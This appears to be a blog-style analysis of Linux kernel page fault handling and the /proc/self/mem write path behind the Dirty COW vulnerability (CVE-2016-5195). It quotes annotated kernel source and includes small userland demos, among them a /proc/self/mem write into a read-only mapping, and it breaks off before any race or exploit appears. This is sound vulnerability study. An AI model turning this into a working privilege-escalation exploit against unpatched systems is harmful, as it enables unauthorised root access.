Analysis of the Linux Page Fault Handling Flow and CVE-2016-5195


Preface

CVE-2016-5195 is the well-known Dirty COW. I had long heard of its elegance and had exploited it in a lab environment before, but back then I just grabbed an exploit script off the internet and never analyzed the root cause. So this time I intend to briefly analyze how the vulnerability arises, along with a simple exploitation.

Note: this article focuses on recording the vulnerability trigger chain; it does not explore concrete Dirty COW exploitation techniques.

The reader is assumed to know or be familiar with: the COW mechanism, page tables, mmap memory mapping, the page cache, and related topics.

A quick aside: when mmap creates a mapping, it only carves out a VMA in the anonymous/file mapping region; no physical memory is allocated at that point, i.e. the corresponding pte is empty. On the first actual access, a page fault is triggered, and during fault handling a physical page is allocated and the pte is updated.
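To see this demand-paging behavior from userland, here is a minimal sketch of mine (my own illustration, not from the original analyses) that inspects the pte's present bit through /proc/self/pagemap. Bit 63 of each 8-byte pagemap entry indicates whether the page is present; note that on some kernels reading pagemap requires extra privileges:

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

/* Read the pagemap entry for addr and return its "present" bit (bit 63). */
static int page_present(void *addr)
{
    int fd = open("/proc/self/pagemap", O_RDONLY);
    uint64_t entry = 0;
    off_t off = ((uintptr_t)addr / 4096) * 8; /* one 8-byte entry per page */
    pread(fd, &entry, sizeof(entry), off);
    close(fd);
    return (entry >> 63) & 1;
}

int main(void)
{
    char *p = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    printf("present before touch: %d\n", page_present(p)); /* 0: pte empty */
    p[0] = 1;                        /* first access triggers the page fault */
    printf("present after touch : %d\n", page_present(p)); /* 1: pte filled */
    return 0;
}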

Overview of the Page Fault Handling Flow

The rough flow is as follows:

//__do_page_fault()
//    __handle_mm_fault()
//        handle_pte_fault()
//            do_wp_page() ==> pte present in memory, write fault
//            do_fault() ==> pte not present, i.e. the first-access path for non-anonymous pages
//                do_read_fault()
//                do_cow_fault() ==> page fault caused by a write
//                do_shared_fault()

__do_page_fault

/*
 * This routine handles page faults.  It determines the address,
 * and the problem, and then passes it off to one of the appropriate
 * routines.
 *
 * This function must have noinline because both callers
 * {,trace_}do_page_fault() have notrace on. Having this an actual function
 * guarantees there's a function trace entry.
 */
static noinline void
__do_page_fault(struct pt_regs *regs, unsigned long error_code,
        unsigned long address)
{
    struct vm_area_struct *vma;
    struct task_struct *tsk;
    struct mm_struct *mm;
    int fault, major = 0;
    // set the allow-retry and killable flags
    unsigned int flags = FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_KILLABLE;

    tsk = current;
    mm = tsk->mm;

    /*
     * Detect and handle instructions that would cause a page fault for
     * both a tracked kernel page and a userspace page.
     */
    if (kmemcheck_active(regs))
        kmemcheck_hide(regs);
    prefetchw(&mm->mmap_sem); // prefetch mmap_sem's cache line for write

    if (unlikely(kmmio_fault(regs, address)))
        return;

    /*
     * We fault-in kernel-space virtual memory on-demand. The
     * 'reference' page table is init_mm.pgd.
     *
     * NOTE! We MUST NOT take any locks for this case. We may
     * be in an interrupt or a critical region, and should
     * only copy the information from the master page table,
     * nothing more.
     *
     * This verifies that the fault happens in kernel space
     * (error_code & 4) == 0, and that the fault was not a
     * protection error (error_code & 9) == 0.
     */
    // address lies in kernel space
    if (unlikely(fault_in_kernel_space(address))) {
        if (!(error_code & (PF_RSVD | PF_USER | PF_PROT))) {
            // PF_RSVD: a reserved bit was set in a page-table entry
            // PF_USER: the fault occurred in user mode
            // PF_PROT: protection violation (the page was present)
            if (vmalloc_fault(address) >= 0)
                return;

            if (kmemcheck_fault(regs, address, error_code))
                return;
        }

        /* Can handle a stale RO->RW TLB: */
        // is this a spurious page fault?
        if (spurious_fault(error_code, address))
            return;

        /* kprobes don't want to hook the spurious faults: */
        if (kprobes_fault(regs))
            return;
        /*
         * Don't take the mm semaphore here. If we fixup a prefetch
         * fault we could otherwise deadlock:
         */
        bad_area_nosemaphore(regs, error_code, address, NULL);

        return;
    }

    // address lies in user space
    /* kprobes don't want to hook the spurious faults: */
    if (unlikely(kprobes_fault(regs)))
        return;

    if (unlikely(error_code & PF_RSVD)) // reserved bit set in a page-table entry
        pgtable_bad(regs, error_code, address);

    if (unlikely(smap_violation(error_code, regs))) { // SMAP protection
        bad_area_nosemaphore(regs, error_code, address, NULL);
        return;
    }

    /*
     * If we're in an interrupt, have no user context or are running
     * in a region with pagefaults disabled then we must not take the fault
     */
    if (unlikely(faulthandler_disabled() || !mm)) {
        bad_area_nosemaphore(regs, error_code, address, NULL);
        return;
    }

    /*
     * It's safe to allow irq's after cr2 has been saved and the
     * vmalloc fault has been handled.
     *
     * User-mode registers count as a user access even for any
     * potential system fault or CPU buglet:
     */
    // the registers indicate user mode
    if (user_mode(regs)) {
        local_irq_enable(); // enable local interrupts
        error_code |= PF_USER;  // add the PF_USER flag
        flags |= FAULT_FLAG_USER;
    } else {
        if (regs->flags & X86_EFLAGS_IF)
            local_irq_enable();
    }

    perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);

    if (error_code & PF_WRITE) // write fault
        flags |= FAULT_FLAG_WRITE;
    if (error_code & PF_INSTR)
        flags |= FAULT_FLAG_INSTRUCTION;

    /*
     * When running in the kernel we expect faults to occur only to
     * addresses in user space.  All other faults represent errors in
     * the kernel and should generate an OOPS.  Unfortunately, in the
     * case of an erroneous fault occurring in a code path which already
     * holds mmap_sem we will deadlock attempting to validate the fault
     * against the address space.  Luckily the kernel only validly
     * references user space from well defined areas of code, which are
     * listed in the exceptions table.
     *
     * As the vast majority of faults will be valid we will only perform
     * the source reference check when there is a possibility of a
     * deadlock. Attempt to lock the address space, if we cannot we then
     * validate the source. If this is invalid we can skip the address
     * space check, thus avoiding the deadlock:
     */
    // take the mmap_sem read lock
    if (unlikely(!down_read_trylock(&mm->mmap_sem))) { // trylock failed
        if ((error_code & PF_USER) == 0 &&
            !search_exception_tables(regs->ip)) {
            bad_area_nosemaphore(regs, error_code, address, NULL);
            return;
        }
retry:
        down_read(&mm->mmap_sem);
    } else {
        /*
         * The above down_read_trylock() might have succeeded in
         * which case we'll have missed the might_sleep() from
         * down_read():
         */
        might_sleep();
    }

    vma = find_vma(mm, address); // find the vma containing address
    if (unlikely(!vma)) { // not found: kill directly
        bad_area(regs, error_code, address);
        return;
    }
    if (likely(vma->vm_start <= address)) // address lies within this vma
        goto good_area;
    if (unlikely(!(vma->vm_flags & VM_GROWSDOWN))) { // stack: if the VM_GROWSDOWN flag is absent, kill directly
        bad_area(regs, error_code, address);
        return;
    }
    if (error_code & PF_USER) {
        /*
         * Accessing the stack below %sp is always a bug.
         * The large cushion allows instructions like enter
         * and pusha to work. ("enter $65535, $31" pushes
         * 32 pointers and then decrements %sp by 65535.)
         */
        if (unlikely(address + 65536 + 32 * sizeof(unsigned long) < regs->sp)) {
            bad_area(regs, error_code, address);
            return;
        }
    }
    if (unlikely(expand_stack(vma, address))) { // grow the stack
        bad_area(regs, error_code, address);
        return;
    }

    /*
     * Ok, we have a good vm_area for this memory access, so
     * we can handle it..
     */
good_area: // reaching here means a legitimate page fault: address belongs to the process address space, so demand paging allocates physical memory
    if (unlikely(access_error(error_code, vma))) {
        bad_area_access_error(regs, error_code, address, vma);
        return;
    }

    /*
     * If for any reason at all we couldn't handle the fault,
     * make sure we exit gracefully rather than endlessly redo
     * the fault.  Since we never set FAULT_FLAG_RETRY_NOWAIT, if
     * we get VM_FAULT_RETRY back, the mmap_sem has been unlocked.
     */
    // the core function that allocates the physical page
    fault = handle_mm_fault(mm, vma, address, flags);
    major |= fault & VM_FAULT_MAJOR;

    /*
     * If we need to retry the mmap_sem has already been released,
     * and if there is a fatal signal pending there is no guarantee
     * that we made any progress. Handle this case first.
     */
    if (unlikely(fault & VM_FAULT_RETRY)) { // retry allowed, but at most once
        /* Retry at most once */
        if (flags & FAULT_FLAG_ALLOW_RETRY) {
            flags &= ~FAULT_FLAG_ALLOW_RETRY; // clear the allow-retry flag
            flags |= FAULT_FLAG_TRIED;
            if (!fatal_signal_pending(tsk))
                goto retry;
        }

        /* User mode? Just return to handle the fatal exception */
        if (flags & FAULT_FLAG_USER)
            return;

        /* Not returning to user mode? Handle exceptions or die: */
        no_context(regs, error_code, address, SIGBUS, BUS_ADRERR);
        return;
    }

    up_read(&mm->mmap_sem);
    if (unlikely(fault & VM_FAULT_ERROR)) {
        mm_fault_error(regs, error_code, address, vma, fault);
        return;
    }

    /*
     * Major/minor page fault accounting. If any of the events
     * returned VM_FAULT_MAJOR, we account it as a major fault.
     */
    if (major) {
        tsk->maj_flt++;
        perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, regs, address);
    } else {
        tsk->min_flt++;
        perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, regs, address);
    }

    check_v8086_mode(regs, address, tsk);
}
NOKPROBE_SYMBOL(__do_page_fault);

Rough flow (a small demo of the fault accounting follows this list):

  • Determine whether address lies in kernel space or user space
  • Kernel space:
    • If the relevant conditions hold, handle via vmalloc_fault
  • User space:
    • For a write fault, set the FAULT_FLAG_WRITE flag
    • If the conditions hold, handle via handle_mm_fault
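As a quick sanity check, the maj_flt/min_flt accounting at the end of __do_page_fault is visible from userland via getrusage(); this is a minimal sketch of mine, not from the original article:

#include <stdio.h>
#include <sys/mman.h>
#include <sys/resource.h>

int main(void)
{
    struct rusage before, after;
    char *p = mmap(NULL, 16 * 4096, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    getrusage(RUSAGE_SELF, &before);
    for (int i = 0; i < 16; i++)
        p[i * 4096] = 1;        /* one first touch per page: 16 minor faults */
    getrusage(RUSAGE_SELF, &after);

    /* expect the counter to grow by roughly 16 */
    printf("minor faults: %ld -> %ld\n", before.ru_minflt, after.ru_minflt);
    return 0;
}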

handle_mm_fault ==> __handle_mm_fault

handle_mm_fault mainly just calls __handle_mm_fault:

/*
 * By the time we get here, we already hold the mm semaphore
 *
 * The mmap_sem may have been released depending on flags and our
 * return value.  See filemap_fault() and __lock_page_or_retry().
 */
static int __handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
                 unsigned long address, unsigned int flags)
{
    // the four page-table levels
    pgd_t *pgd;
    pud_t *pud;
    pmd_t *pmd;
    pte_t *pte;

    if (!arch_vma_access_permitted(vma, flags & FAULT_FLAG_WRITE,
                        flags & FAULT_FLAG_INSTRUCTION,
                        flags & FAULT_FLAG_REMOTE))
        return VM_FAULT_SIGSEGV;

    if (unlikely(is_vm_hugetlb_page(vma)))
        return hugetlb_fault(mm, vma, address, flags);

    pgd = pgd_offset(mm, address); // get the page global directory entry
    pud = pud_alloc(mm, pgd, address); // allocate the page upper directory entry
    if (!pud)
        return VM_FAULT_OOM;
    pmd = pmd_alloc(mm, pud, address); // allocate the page middle directory entry
    if (!pmd)
        return VM_FAULT_OOM;
    if (pmd_none(*pmd) && transparent_hugepage_enabled(vma)) {
        int ret = create_huge_pmd(mm, vma, address, pmd, flags);
        if (!(ret & VM_FAULT_FALLBACK))
            return ret;
    } else {
        pmd_t orig_pmd = *pmd;
        int ret;

        barrier();
        if (pmd_trans_huge(orig_pmd) || pmd_devmap(orig_pmd)) {
            unsigned int dirty = flags & FAULT_FLAG_WRITE;

            if (pmd_protnone(orig_pmd))
                return do_huge_pmd_numa_page(mm, vma, address,
                                 orig_pmd, pmd);

            if (dirty && !pmd_write(orig_pmd)) {
                ret = wp_huge_pmd(mm, vma, address, pmd,
                            orig_pmd, flags);
                if (!(ret & VM_FAULT_FALLBACK))
                    return ret;
            } else {
                huge_pmd_set_accessed(mm, vma, address, pmd,
                              orig_pmd, dirty);
                return 0;
            }
        }
    }

    /*
     * Use pte_alloc() instead of pte_alloc_map, because we can't
     * run pte_offset_map on the pmd, if an huge pmd could
     * materialize from under us from a different thread.
     */
    if (unlikely(pte_alloc(mm, pmd, address)))
        return VM_FAULT_OOM;
    /*
     * If a huge pmd materialized under us just retry later.  Use
     * pmd_trans_unstable() instead of pmd_trans_huge() to ensure the pmd
     * didn't become pmd_trans_huge under us and then back to pmd_none, as
     * a result of MADV_DONTNEED running immediately after a huge pmd fault
     * in a different thread of this mm, in turn leading to a misleading
     * pmd_trans_huge() retval.  All we have to ensure is that it is a
     * regular pmd that we can walk with pte_offset_map() and we can do that
     * through an atomic read in C, which is what pmd_trans_unstable()
     * provides.
     */
    if (unlikely(pmd_trans_unstable(pmd) || pmd_devmap(*pmd)))
        return 0;
    /*
     * A regular pmd is established and it can't morph into a huge pmd
     * from under us anymore at this point because we hold the mmap_sem
     * read mode and khugepaged takes it in write mode. So now it's
     * safe to run pte_offset_map().
     */
    pte = pte_offset_map(pmd, address); // get the page table entry

    return handle_pte_fault(mm, vma, address, pte, pmd, flags); // the core handler
}

Rough flow:

  • Allocate each level of the page tables and obtain the page table entry
  • In the normal case, finish by handling the fault in handle_pte_fault

handle_pte_fault

/*
 * These routines also need to handle stuff like marking pages dirty
 * and/or accessed for architectures that don't do it in hardware (most
 * RISC architectures).  The early dirtying is also good on the i386.
 *
 * There is also a hook called "update_mmu_cache()" that architectures
 * with external mmu caches can use to update those (ie the Sparc or
 * PowerPC hashed page tables that act as extended TLBs).
 *
 * We enter with non-exclusive mmap_sem (to exclude vma changes,
 * but allow concurrent faults), and pte mapped but not yet locked.
 * We return with pte unmapped and unlocked.
 *
 * The mmap_sem may have been released depending on flags and our
 * return value.  See filemap_fault() and __lock_page_or_retry().
 */
static int handle_pte_fault(struct mm_struct *mm,
             struct vm_area_struct *vma, unsigned long address,
             pte_t *pte, pmd_t *pmd, unsigned int flags)
{
    pte_t entry;
    spinlock_t *ptl;

    /*
     * some architectures can have larger ptes than wordsize,
     * e.g.ppc44x-defconfig has CONFIG_PTE_64BIT=y and CONFIG_32BIT=y,
     * so READ_ONCE or ACCESS_ONCE cannot guarantee atomic accesses.
     * The code below just needs a consistent view for the ifs and
     * we later double check anyway with the ptl lock held. So here
     * a barrier will do.
     */
    entry = *pte; // read the pte contents
    barrier();
    // the page is not present in memory
    if (!pte_present(entry)) {
        if (pte_none(entry)) { // empty pte: first access to this page
            if (vma_is_anonymous(vma)) // anonymous page handling
                return do_anonymous_page(mm, vma, address,
                             pte, pmd, flags);
            else
                return do_fault(mm, vma, address, pte, pmd,
                        flags, entry); // non-anonymous page handling
        }
        // non-empty pte: the page was accessed before; load it back from the swap area
        return do_swap_page(mm, vma, address,
                    pte, pmd, flags, entry);
    }

    // the page is present in memory
    if (pte_protnone(entry))
        return do_numa_page(mm, vma, address, entry, pte, pmd);

    ptl = pte_lockptr(mm, pmd);
    spin_lock(ptl); // take the spinlock
    if (unlikely(!pte_same(*pte, entry))) // concurrency check
        goto unlock;
    if (flags & FAULT_FLAG_WRITE) { // write fault: FAULT_FLAG_WRITE
        if (!pte_write(entry)) // the page is not writable
            return do_wp_page(mm, vma, address,
                    pte, pmd, ptl, entry); // perform COW, writing into the page allocated by do_fault()->do_cow_fault()
        entry = pte_mkdirty(entry); // mark the page dirty
    }
    entry = pte_mkyoung(entry); // set the accessed (young) bit
    if (ptep_set_access_flags(vma, address, pte, entry, flags & FAULT_FLAG_WRITE)) {
        update_mmu_cache(vma, address, pte); // the pte contents changed; write the new contents into the page table entry
    } else {
        /*
         * This is needed only for protection faults but the arch code
         * is not yet telling us if this is a protection fault or not.
         * This still avoids useless tlb flushes for .text page faults
         * with threads.
         */
        if (flags & FAULT_FLAG_WRITE)
            flush_tlb_fix_spurious_fault(vma, address);
    }
unlock:
    pte_unmap_unlock(pte, ptl);
    return 0;
}

Rough flow:

  • Read the page referenced by the page table entry
    • The page is not present in memory
      • The pte is empty
        • Anonymous page: handle via do_anonymous_page
        • Non-anonymous page: handle via do_fault
      • The pte is not empty
        • Swap the page back into memory from the swap area
    • The page is present in memory
      • Write fault
        • The page is not writable: call do_wp_page to perform COW
        • The page is writable: mark it dirty
      • Not a write fault
        • Update the pte

do_fault ==> non-anonymous page handling

/*
 * We enter with non-exclusive mmap_sem (to exclude vma changes,
 * but allow concurrent faults).
 * The mmap_sem may have been released depending on flags and our
 * return value.  See filemap_fault() and __lock_page_or_retry().
 */
static int do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
        unsigned long address, pte_t *page_table, pmd_t *pmd,
        unsigned int flags, pte_t orig_pte)
{
    pgoff_t pgoff = linear_page_index(vma, address);

    pte_unmap(page_table);
    /* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
    if (!vma->vm_ops->fault)
        return VM_FAULT_SIGBUS;
    if (!(flags & FAULT_FLAG_WRITE)) // not a write fault
        return do_read_fault(mm, vma, address, pmd, pgoff, flags,
                orig_pte);
    if (!(vma->vm_flags & VM_SHARED)) // private (non-shared) mapping
        return do_cow_fault(mm, vma, address, pmd, pgoff, flags,
                orig_pte);
    return do_shared_fault(mm, vma, address, pmd, pgoff, flags, orig_pte); // shared mapping
}

Rough flow (a small demo contrasting the private and shared write paths follows this list):

  • Fault caused by a read: handle via do_read_fault
  • Fault caused by a write to a private mapping: handle via do_cow_fault
  • Fault caused by other operations: handle via do_shared_fault
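The private/shared split is easy to observe from userland. In this minimal sketch of mine (demo.txt is just a made-up scratch file), the write through the MAP_PRIVATE mapping takes the do_cow_fault path and never reaches the file, while the write through the MAP_SHARED mapping takes the do_shared_fault path and does:

#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void)
{
    int fd = open("demo.txt", O_RDWR | O_CREAT | O_TRUNC, 0644);
    write(fd, "hello", 5);

    /* private mapping: the write fault goes through do_cow_fault and
     * dirties an anonymous copy that is never written back */
    char *priv = mmap(NULL, 5, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    priv[0] = 'H';

    /* shared mapping: the write fault goes through do_shared_fault and
     * dirties the page cache page itself, which is synced to disk */
    char *shar = mmap(NULL, 5, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    shar[4] = 'O';
    msync(shar, 5, MS_SYNC);

    char buf[6] = {0};
    pread(fd, buf, 5, 0);
    printf("file now: %s\n", buf); /* "hellO": the private write was lost */
    return 0;
}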

do_cow_fault

static int do_cow_fault(struct mm_struct *mm, struct vm_area_struct *vma,
        unsigned long address, pmd_t *pmd,
        pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
{
    struct page *fault_page, *new_page;
    struct mem_cgroup *memcg;
    spinlock_t *ptl;
    pte_t *pte;
    int ret;

    if (unlikely(anon_vma_prepare(vma)))
        return VM_FAULT_OOM;

    new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, address); // allocate a new physical page
    if (!new_page)
        return VM_FAULT_OOM;

    if (mem_cgroup_try_charge(new_page, mm, GFP_KERNEL, &memcg, false)) {
        put_page(new_page);
        return VM_FAULT_OOM;
    }

    ret = __do_fault(vma, address, pgoff, flags, new_page, &fault_page);  // read the file contents into fault_page
    if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
        goto uncharge_out;

    if (fault_page)
        copy_user_highpage(new_page, fault_page, address, vma); // copy fault_page's contents into new_page
    __SetPageUptodate(new_page);

    pte = pte_offset_map_lock(mm, pmd, address, &ptl); // map the pte and take the page-table lock
    if (unlikely(!pte_same(*pte, orig_pte))) { // concurrency check
        pte_unmap_unlock(pte, ptl);
        if (fault_page) {
            unlock_page(fault_page);
            put_page(fault_page);
        } else {
            /*
             * The fault handler has no page to lock, so it holds
             * i_mmap_lock for read to protect against truncate.
             */
            i_mmap_unlock_read(vma->vm_file->f_mapping);
        }
        goto uncharge_out;
    }
    // set the pte: install the new entry in this process's page table;
    // write=true and anon=true, so the entry is marked writable/dirty and
    // the page is treated as an anonymous page
    do_set_pte(vma, address, new_page, pte, true, true);
    mem_cgroup_commit_charge(new_page, memcg, false, false);
    lru_cache_add_active_or_unevictable(new_page, vma);
    pte_unmap_unlock(pte, ptl);
    if (fault_page) {
        unlock_page(fault_page);
        put_page(fault_page); // drop the reference on fault_page
    } else {
        /*
         * The fault handler has no page to lock, so it holds
         * i_mmap_lock for read to protect against truncate.
         */
        i_mmap_unlock_read(vma->vm_file->f_mapping);
    }
    return ret;
uncharge_out:
    mem_cgroup_cancel_charge(new_page, memcg, false);
    put_page(new_page);
    return ret;
}

Rough flow:

  • Allocate a new page
  • Update the page table entry

Note: nothing has actually been written at this point.

do_wp_page

static int do_wp_page(struct mm_struct *mm, struct vm_area_struct *vma,
        unsigned long address, pte_t *page_table, pmd_t *pmd,
        spinlock_t *ptl, pte_t orig_pte)
    __releases(ptl)
{
    struct page *old_page;

    old_page = vm_normal_page(vma, address, orig_pte);
    if (!old_page) {
        /*
         * VM_MIXEDMAP !pfn_valid() case, or VM_SOFTDIRTY clear on a
         * VM_PFNMAP VMA.
         *
         * We should not cow pages in a shared writeable mapping.
         * Just mark the pages writable and/or call ops->pfn_mkwrite.
         */
        if ((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
                     (VM_WRITE|VM_SHARED))
            return wp_pfn_shared(mm, vma, address, page_table, ptl,
                         orig_pte, pmd);

        pte_unmap_unlock(page_table, ptl);
        return wp_page_copy(mm, vma, address, page_table, pmd,
                    orig_pte, old_page);
    }

    /*
     * Take out anonymous pages first, anonymous shared vmas are
     * not dirty accountable.
     */
    // handle anonymous pages
    if (PageAnon(old_page) && !PageKsm(old_page)) {
        int total_mapcount;
        if (!trylock_page(old_page)) { // concurrency: contend for the page lock
            get_page(old_page);
            pte_unmap_unlock(page_table, ptl);
            lock_page(old_page);
            page_table = pte_offset_map_lock(mm, pmd, address,
                             &ptl);
            if (!pte_same(*page_table, orig_pte)) {
                unlock_page(old_page);
                pte_unmap_unlock(page_table, ptl);
                put_page(old_page);
                return 0;
            }
            put_page(old_page);
        }
        // the real handling starts here:
        // reuse_swap_page first checks whether this page has only a single user;
        // if so, wp_page_reuse is called to reuse the page directly
        if (reuse_swap_page(old_page, &total_mapcount)) {
            if (total_mapcount == 1) {
                /*
                 * The page is all ours. Move it to
                 * our anon_vma so the rmap code will
                 * not search our parent or siblings.
                 * Protected against the rmap code by
                 * the page lock.
                 */
                page_move_anon_rmap(compound_head(old_page),
                            vma, address);
            }
            unlock_page(old_page);
            // the normal COW flow reaches here: it reuses the page already allocated by do_cow_fault() and does not allocate a new one
            return wp_page_reuse(mm, vma, address, page_table, ptl,
                         orig_pte, old_page, 0, 0);
        }
        unlock_page(old_page);
    } else if (unlikely((vma->vm_flags & (VM_WRITE|VM_SHARED)) ==
                    (VM_WRITE|VM_SHARED))) {
        return wp_page_shared(mm, vma, address, page_table, pmd,
                      ptl, orig_pte, old_page);
    }

    /*
     * Ok, we need to copy. Oh, well..
     */
    get_page(old_page);

    pte_unmap_unlock(page_table, ptl);
    return wp_page_copy(mm, vma, address, page_table, pmd,
                orig_pte, old_page);
}

COW and Page Faults

When we mmap a read-only file and then try to write directly to the existing shared page through the /proc/self/mem file, the mem_write function in the corresponding file_operations table is invoked:

static const struct file_operations proc_mem_operations = {
    .llseek        = mem_lseek,
    .read        = mem_read,
    .write        = mem_write,
    .open        = mem_open,
    .release    = mem_release,
};

mem_write is in fact just a wrapper around mem_rw:

static ssize_t mem_write(struct file *file, const char __user *buf,
             size_t count, loff_t *ppos)
{
    return mem_rw(file, (char __user*)buf, count, ppos, 1);
}
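Before diving into mem_rw, here is a userland sketch of mine of the exact path being traced: writing through /proc/self/mem into a read-only private file mapping. FOLL_FORCE lets the write go through, and on a patched kernel COW redirects it into an anonymous page, so the mapping changes in memory while the underlying file stays intact (/etc/hostname is just an example of any readable, non-empty file; a 64-bit off_t is assumed):

#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void)
{
    int fd = open("/etc/hostname", O_RDONLY);   /* any readable file */
    char *map = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0);

    int mem = open("/proc/self/mem", O_RDWR);   /* goes to mem_write/mem_rw */
    lseek(mem, (off_t)(unsigned long)map, SEEK_SET);
    write(mem, "X", 1);                         /* kicks off the COW chain */

    /* 'X' is visible through the mapping, but the file is unchanged */
    printf("mapping now starts with: %c\n", map[0]);
    return 0;
}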

mem_rw

static ssize_t mem_rw(struct file *file, char __user *buf,
            size_t count, loff_t *ppos, int write)
{
    struct mm_struct *mm = file->private_data;
    unsigned long addr = *ppos;
    ssize_t copied;
    char *page;

    if (!mm)
        return 0;

    page = (char *)__get_free_page(GFP_TEMPORARY); // allocate a temporary free page
    if (!page)
        return -ENOMEM;

    copied = 0;
    if (!atomic_inc_not_zero(&mm->mm_users))
        goto free;

    while (count > 0) {
        int this_len = min_t(int, count, PAGE_SIZE);
        // for a write, copy the data from user space into the temporary page
        if (write && copy_from_user(page, buf, this_len)) {
            copied = -EFAULT;
            break;
        }
        // access_remote_vm() performs the actual memory access
        this_len = access_remote_vm(mm, addr, page, this_len, write);
        if (!this_len) {
            if (!copied)
                copied = -EIO;
            break;
        }
        // for a read, the requested data has by now been read into the temporary page; copy it back to user space
        if (!write && copy_to_user(buf, page, this_len)) {
            copied = -EFAULT;
            break;
        }

        buf += this_len;
        addr += this_len;
        copied += this_len;
        count -= this_len;
    }
    *ppos = addr;

    mmput(mm);
free: // free the temporary page
    free_page((unsigned long) page);
    return copied;
}

The rough flow is as follows:

  • Call __get_free_page() to allocate a free page as temporary storage for the user data
  • Call access_remote_vm() to perform the memory access, reading or writing the target pages according to the write parameter

access_remote_vm is in turn a wrapper around __access_remote_vm:

int access_remote_vm(struct mm_struct *mm, unsigned long addr,
        void *buf, int len, int write)
{
    return __access_remote_vm(NULL, mm, addr, buf, len, write);
}

__access_remote_vm

static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
        unsigned long addr, void *buf, int len, int write)
{
    struct vm_area_struct *vma;
    void *old_buf = buf;

    down_read(&mm->mmap_sem);
    /* ignore errors, just check how much was successfully transferred */
    while (len) {
        int bytes, ret, offset;
        void *maddr;
        struct page *page = NULL;
        // get the target page of the operation (the page to read from / write to)
        ret = get_user_pages_remote(tsk, mm, addr, 1,
                write, 1, &page, &vma);
        if (ret <= 0) { // failed
#ifndef CONFIG_HAVE_IOREMAP_PROT
            break;
#else
            /*
             * Check if this is a VM_IO | VM_PFNMAP VMA, which
             * we can access using slightly different code.
             */
            vma = find_vma(mm, addr);
            if (!vma || vma->vm_start > addr)
                break;
            if (vma->vm_ops && vma->vm_ops->access)
                ret = vma->vm_ops->access(vma, addr, buf,
                              len, write);
            if (ret <= 0)
                break;
            bytes = ret;
#endif
        } else {
            bytes = len;
            offset = addr & (PAGE_SIZE-1);
            if (bytes > PAGE_SIZE-offset)
                bytes = PAGE_SIZE-offset;
    // kmap establishes a temporary mapping for the page we obtained: we only hold a struct page, which must be mapped at a virtual address before it can be accessed
            maddr = kmap(page);
            if (write) {
                copy_to_user_page(vma, page, addr,
                          maddr + offset, buf, bytes); // write the data into the page
                set_page_dirty_lock(page);
            } else {
                copy_from_user_page(vma, page, addr,
                            buf, maddr + offset, bytes); // read the data from the page
            }
            kunmap(page);
            put_page(page);
        }
        len -= bytes;
        buf += bytes;
        addr += bytes;
    }
    up_read(&mm->mmap_sem);

    return buf - old_buf;
}

Rough flow:

  • Obtain the target page via get_user_pages_remote() (note this returns a struct page, since the physical page may not be mapped anywhere yet)
  • Obtain the virtual address the page is mapped at via kmap() (a new temporary mapping is established if there is none)
  • Read/write the page via copy_from_user_page()/copy_to_user_page()

The code I analyzed seems to differ slightly from what is posted online; I am not sure whether that is down to a different kernel version or to my reading patched code. Either way, it does not change the flow.

get_user_pages_remote is a wrapper around __get_user_pages_locked:

long get_user_pages_remote(struct task_struct *tsk, struct mm_struct *mm,
        unsigned long start, unsigned long nr_pages,
        int write, int force, struct page **pages,
        struct vm_area_struct **vmas)
{
    return __get_user_pages_locked(tsk, mm, start, nr_pages, write, force,
                       pages, vmas, NULL, false,
                       FOLL_TOUCH | FOLL_REMOTE);
}
EXPORT_SYMBOL(get_user_pages_remote);

__get_user_pages_locked ultimately calls down into __get_user_pages:

static __always_inline long __get_user_pages_locked(struct task_struct *tsk,
                        struct mm_struct *mm,
                        unsigned long start,
                        unsigned long nr_pages,
                        int write, int force,
                        struct page **pages,
                        struct vm_area_struct **vmas,
                        int *locked, bool notify_drop,
                        unsigned int flags)
{
    long ret, pages_done;
    bool lock_dropped;

    if (locked) {
        /* if VM_FAULT_RETRY can be returned, vmas become invalid */
        BUG_ON(vmas);
        /* check caller initialized locked */
        BUG_ON(*locked != 1);
    }

    if (pages)
        flags |= FOLL_GET;
    if (write)
        flags |= FOLL_WRITE;
    if (force)
        flags |= FOLL_FORCE;

    pages_done = 0;
    lock_dropped = false;
    for (;;) {
        ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
                       vmas, locked);
    ......

Note: for a write, the FOLL_WRITE flag is set.

__get_user_pages

long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
        unsigned long start, unsigned long nr_pages,
        unsigned int gup_flags, struct page **pages,
        struct vm_area_struct **vmas, int *nonblocking)
{
    long i = 0;
    unsigned int page_mask;
    struct vm_area_struct *vma = NULL;

    if (!nr_pages)
        return 0;

    VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));

    /*
     * If FOLL_FORCE is set then do not force a full fault as the hinting
     * fault information is unrelated to the reference behaviour of a task
     * using the address space
     */
    if (!(gup_flags & FOLL_FORCE))
        gup_flags |= FOLL_NUMA;

    do {
        struct page *page;
        unsigned int foll_flags = gup_flags;
        unsigned int page_increm;

        /* first iteration or cross vma bound */
        if (!vma || start >= vma->vm_end) {
            vma = find_extend_vma(mm, start);
            if (!vma && in_gate_area(mm, start)) {
                int ret;
